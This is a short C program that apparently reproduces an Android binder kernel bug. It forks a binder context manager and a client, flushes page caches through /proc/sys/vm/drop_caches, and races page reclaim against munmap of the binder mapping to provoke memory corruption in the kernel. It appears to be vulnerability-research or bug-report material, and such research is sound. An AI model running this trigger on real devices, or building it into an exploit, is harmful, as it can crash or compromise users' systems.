#include <pthread.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/prctl.h>
#include <unistd.h>

#include "binder.h"

static struct binder_state *bs;

int manager_binder_handler(struct binder_state *bs, struct binder_transaction_data *txn, struct binder_io *msg, struct binder_io *reply) {
  printf("got transaction!\n");
  bio_put_uint32(reply, 0);
  return 0;
}

void *munmap_thread(void *arg) {
  printf("$$$ sleeping before munmap...\n");
  usleep(200*1000);
  printf("$$$ calling munmap now...\n");
  munmap(bs->mapped, bs->mapsize);
  printf("$$$ munmap done\n");
  return NULL;
}

void flush_pages(void) {
  printf("### FLUSHING PAGES\n");
  int drop_caches_fd = open("/proc/sys/vm/drop_caches", O_WRONLY);
  if (drop_caches_fd == -1) err(1, "open drop_caches");
  if (write(drop_caches_fd, "2", 1) != 1) err(1, "write drop_caches");
  printf("### END OF PAGE FLUSH\n");
}

int main(int argc, char** argv) {
  setbuf(stdout, NULL);

  pid_t parent = getpid();
  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    if (prctl(PR_SET_PDEATHSIG, SIGKILL)) err(1, "prctl");
    if (getppid() != parent) exit(0);

    sleep(1);
    bs = binder_open(0x400000);
    if (bs == NULL) err(1, "binder_open");

    // The ping allocates binder memory in both the parent and the child.
    printf("### PING\n");
    struct binder_io msg;
    struct binder_io reply;
    char data[0x1000];
    uint32_t handle = 0;

    bio_init(&msg, data, sizeof(data), 4);
    bio_put_uint32(&msg, 0);
    binder_call(bs, &msg, &reply, 0, 1);
    // Query is deallocated, reply isn't deallocated yet - collect page from
    // the parent process.
    flush_pages();
    binder_done(bs, &msg, &reply);
    printf("### PING DONE\n");

    // Collect page from our process, with concurrent munmap().
    pthread_t thread;
    if (pthread_create(&thread, NULL, munmap_thread, NULL))
      errx(1, "pthread_create");
    flush_pages();

    sleep(5);
    kill(parent, SIGKILL);
  } else {
    bs = binder_open(0x400000);
    if (bs == NULL) err(1, "binder_open");
    if (binder_become_context_manager(bs)) err(1, "binder_become_context_manager");

    binder_loop(bs, manager_binder_handler);
  
    return 0;
  }
}
